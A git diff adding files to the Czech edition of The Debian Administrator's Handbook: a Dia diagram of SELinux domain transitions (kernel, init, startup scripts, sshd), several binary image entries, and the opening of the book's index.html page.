+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/images/selinux-transitions.dia
@@ -0,0 +1,741 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<dia:diagram xmlns:dia="http://www.lysator.liu.se/~alla/dia/">
+  <dia:diagramdata>
+    <dia:attribute name="background">
+      <dia:color val="#ffffff"/>
+    </dia:attribute>
+    <dia:attribute name="pagebreak">
+      <dia:color val="#000099"/>
+    </dia:attribute>
+    <dia:attribute name="paper">
+      <dia:composite type="paper">
+        <dia:attribute name="name">
+          <dia:string>#A4#</dia:string>
+        </dia:attribute>
+        <dia:attribute name="tmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="bmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="lmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="rmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="is_portrait">
+          <dia:boolean val="true"/>
+        </dia:attribute>
+        <dia:attribute name="scaling">
+          <dia:real val="1"/>
+        </dia:attribute>
+        <dia:attribute name="fitto">
+          <dia:boolean val="false"/>
+        </dia:attribute>
+      </dia:composite>
+    </dia:attribute>
+    <dia:attribute name="grid">
+      <dia:composite type="grid">
+        <dia:attribute name="width_x">
+          <dia:real val="1"/>
+        </dia:attribute>
+        <dia:attribute name="width_y">
+          <dia:real val="1"/>
+        </dia:attribute>
+        <dia:attribute name="visible_x">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:attribute name="visible_y">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:composite type="color"/>
+      </dia:composite>
+    </dia:attribute>
+    <dia:attribute name="color">
+      <dia:color val="#d8e5e5"/>
+    </dia:attribute>
+    <dia:attribute name="guides">
+      <dia:composite type="guides">
+        <dia:attribute name="hguides"/>
+        <dia:attribute name="vguides"/>
+      </dia:composite>
+    </dia:attribute>
+  </dia:diagramdata>
+  <dia:layer name="Arrière-plan" visible="true" active="true">
+    <dia:object type="Flowchart - Box" version="0" id="O0">
+      <dia:attribute name="obj_pos">
+        <dia:point val="3.0825,2.25"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="3.0325,2.2;6.775,5"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="3.0825,2.25"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.6425000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="2.7000000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Kernel
+kernel_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="4.90375,3.395"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O1">
+      <dia:attribute name="obj_pos">
+        <dia:point val="4.90375,0.839375"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="2.59375,0.244375;7.21375,1.78938"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Processes
+and domains#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="80" name="Helvetica-Bold"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="4.90375,0.839375"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O2">
+      <dia:attribute name="obj_pos">
+        <dia:point val="13.3498,0.848125"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="11.2048,0.2345;15.5134,1.83537"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Objects and
+types#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="80" name="Helvetica-Bold"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.3498,0.848125"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O3">
+      <dia:attribute name="obj_pos">
+        <dia:point val="3.10375,6.045"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="3.05375,5.995;6.75375,8.795"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="3.10375,6.045"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.6000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="2.7000000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Init
+init_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="4.90375,7.19"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Document" version="1" id="O4">
+      <dia:attribute name="obj_pos">
+        <dia:point val="10.7736,2.89"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="10.7236,2.84;15.9936,6.25995"/>
+      </dia:attribute>
+      <dia:attribute name="meta">
+        <dia:composite type="dict"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="10.7736,2.89"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="5.1699999999999999"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="3.3699494936611667"/>
+      </dia:attribute>
+      <dia:attribute name="line_width">
+        <dia:real val="0.10000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="line_colour">
+        <dia:color val="#000000"/>
+      </dia:attribute>
+      <dia:attribute name="fill_colour">
+        <dia:color val="#ffffff"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="line_style">
+        <dia:enum val="0"/>
+        <dia:real val="1"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.35355339059327379"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#/sbin/init
+init_exec_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.3586,3.89355"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="flip_horizontal">
+        <dia:boolean val="false"/>
+      </dia:attribute>
+      <dia:attribute name="flip_vertical">
+        <dia:boolean val="false"/>
+      </dia:attribute>
+      <dia:attribute name="subscale">
+        <dia:real val="1"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O5">
+      <dia:attribute name="obj_pos">
+        <dia:point val="6.725,3.6"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.67485,3.2485;10.8854,3.9721"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="6.725,3.6"/>
+        <dia:point val="10.7736,3.61213"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O0" connection="8"/>
+        <dia:connection handle="1" to="O4" connection="5"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O6">
+      <dia:attribute name="obj_pos">
+        <dia:point val="10.7736,5.0564"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.60026,4.9912;10.8388,6.83278"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="10.7736,5.0564"/>
+        <dia:point val="6.70375,6.72"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="line_style">
+        <dia:enum val="4"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O4" connection="7"/>
+        <dia:connection handle="1" to="O3" connection="6"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Flowchart - Document" version="1" id="O7">
+      <dia:attribute name="obj_pos">
+        <dia:point val="10.7486,7.0125"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="10.6986,6.9625;16.0186,10.3824"/>
+      </dia:attribute>
+      <dia:attribute name="meta">
+        <dia:composite type="dict"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="10.7486,7.0125"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="5.2200000000000006"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="3.3699494936611667"/>
+      </dia:attribute>
+      <dia:attribute name="line_width">
+        <dia:real val="0.10000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="line_colour">
+        <dia:color val="#000000"/>
+      </dia:attribute>
+      <dia:attribute name="fill_colour">
+        <dia:color val="#ffffff"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="line_style">
+        <dia:enum val="0"/>
+        <dia:real val="1"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.35355339059327379"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#/etc/init.d/rcS
+initrc_exec_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.3586,8.01605"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="flip_horizontal">
+        <dia:boolean val="false"/>
+      </dia:attribute>
+      <dia:attribute name="flip_vertical">
+        <dia:boolean val="false"/>
+      </dia:attribute>
+      <dia:attribute name="subscale">
+        <dia:real val="1"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O8">
+      <dia:attribute name="obj_pos">
+        <dia:point val="2.0075,9.84"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="1.9575,9.79;7.85,12.59"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="2.0075,9.84"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="5.7924999999999995"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="2.7000000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#Startup scripts
+initrc_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="4.90375,10.985"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O9">
+      <dia:attribute name="obj_pos">
+        <dia:point val="8.05,3.25"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="8.05,2.655;9.5425,3.4"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#exec#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="8.05,3.25"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="0"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O10">
+      <dia:attribute name="obj_pos">
+        <dia:point val="6.75,7.7"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.69957,7.36754;10.8604,8.09112"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="6.75,7.7"/>
+        <dia:point val="10.7486,7.73463"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="1" to="O7" connection="5"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O11">
+      <dia:attribute name="obj_pos">
+        <dia:point val="10.7486,9.1789"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="7.69816,9.11272;10.8148,10.6067"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="10.7486,9.1789"/>
+        <dia:point val="7.8,10.515"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="line_style">
+        <dia:enum val="4"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O7" connection="7"/>
+        <dia:connection handle="1" to="O8" connection="6"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Flowchart - Document" version="1" id="O12">
+      <dia:attribute name="obj_pos">
+        <dia:point val="10.7325,11.135"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="10.6825,11.085;16.0346,14.5049"/>
+      </dia:attribute>
+      <dia:attribute name="meta">
+        <dia:composite type="dict"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="10.7325,11.135"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="5.2521067811865478"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="3.3699494936611667"/>
+      </dia:attribute>
+      <dia:attribute name="line_width">
+        <dia:real val="0.10000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="line_colour">
+        <dia:color val="#000000"/>
+      </dia:attribute>
+      <dia:attribute name="fill_colour">
+        <dia:color val="#ffffff"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="line_style">
+        <dia:enum val="0"/>
+        <dia:real val="1"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.35355339059327379"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#/usr/sbin/sshd
+sshd_exec_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.3586,12.1386"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="flip_horizontal">
+        <dia:boolean val="false"/>
+      </dia:attribute>
+      <dia:attribute name="flip_vertical">
+        <dia:boolean val="false"/>
+      </dia:attribute>
+      <dia:attribute name="subscale">
+        <dia:real val="1"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O13">
+      <dia:attribute name="obj_pos">
+        <dia:point val="2.35,13.635"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="2.3,13.585;7.5075,16.385"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="2.35,13.635"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="5.1074999999999999"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="2.7000000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#SSH server
+sshd_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="4.90375,14.78"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O14">
+      <dia:attribute name="obj_pos">
+        <dia:point val="7.8,11.865"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="7.74987,11.4969;10.8668,12.2205"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="7.8,11.865"/>
+        <dia:point val="10.755,11.8571"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O8" connection="10"/>
+        <dia:connection handle="1" to="O12" connection="5"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O15">
+      <dia:attribute name="obj_pos">
+        <dia:point val="10.755,13.3014"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="7.35059,13.239;10.8174,14.477"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="10.755,13.3014"/>
+        <dia:point val="7.4575,14.31"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="line_style">
+        <dia:enum val="4"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O12" connection="7"/>
+        <dia:connection handle="1" to="O13" connection="6"/>
+      </dia:connections>
+    </dia:object>
+  </dia:layer>
+</dia:diagram>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/selinux-transitions.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/selinux-transitions.png
new file mode 100644
index 000000000..be53f64ae
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/selinux-transitions.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/ssh-L.dia b/publish/cs-CZ/Debian/9/html/debian-handbook/images/ssh-L.dia
new file mode 100644
index 000000000..6aedac4d3
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/ssh-L.dia differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/ssh-L.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/ssh-L.png
new file mode 100644
index 000000000..968e51a25
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/ssh-L.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/ssh-R.dia b/publish/cs-CZ/Debian/9/html/debian-handbook/images/ssh-R.dia
new file mode 100644
index 000000000..4377665c4
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/ssh-R.dia differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/ssh-R.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/ssh-R.png
new file mode 100644
index 000000000..33c7c5246
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/ssh-R.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/startup-systemd.dia b/publish/cs-CZ/Debian/9/html/debian-handbook/images/startup-systemd.dia
new file mode 100644
index 000000000..fd6f86e3b
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/startup-systemd.dia differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/startup-systemd.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/startup-systemd.png
new file mode 100644
index 000000000..2b86da4d5
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/startup-systemd.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/startup-sysvinit.dia b/publish/cs-CZ/Debian/9/html/debian-handbook/images/startup-sysvinit.dia
new file mode 100644
index 000000000..c10cbf532
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/startup-sysvinit.dia differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/startup-sysvinit.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/startup-sysvinit.png
new file mode 100644
index 000000000..d872690bf
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/startup-sysvinit.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/synaptic.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/synaptic.png
new file mode 100644
index 000000000..f977a1fa6
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/synaptic.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/thunderbird.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/thunderbird.png
new file mode 100644
index 000000000..d26d2b3e7
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/thunderbird.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/virtual-package.dia b/publish/cs-CZ/Debian/9/html/debian-handbook/images/virtual-package.dia
new file mode 100644
index 000000000..f6b424d37
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/virtual-package.dia differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/virtual-package.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/virtual-package.png
new file mode 100644
index 000000000..b819f947c
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/virtual-package.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/wireshark.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/wireshark.png
new file mode 100644
index 000000000..c27b6f3b5
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/wireshark.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/xfce.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/xfce.png
new file mode 100644
index 000000000..295160ef0
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/xfce.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/index.html b/publish/cs-CZ/Debian/9/html/debian-handbook/index.html
new file mode 100644
index 000000000..de5877a09
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/index.html
@@ -0,0 +1,1024 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">The Debian Administrator's Handbook</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="description"
+        content="A reference book presenting the Debian distribution, from initial installation to configuration of services." /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="next"
+        href="preface.html"
+        title="Úvodní slovo" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="preface.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="book"
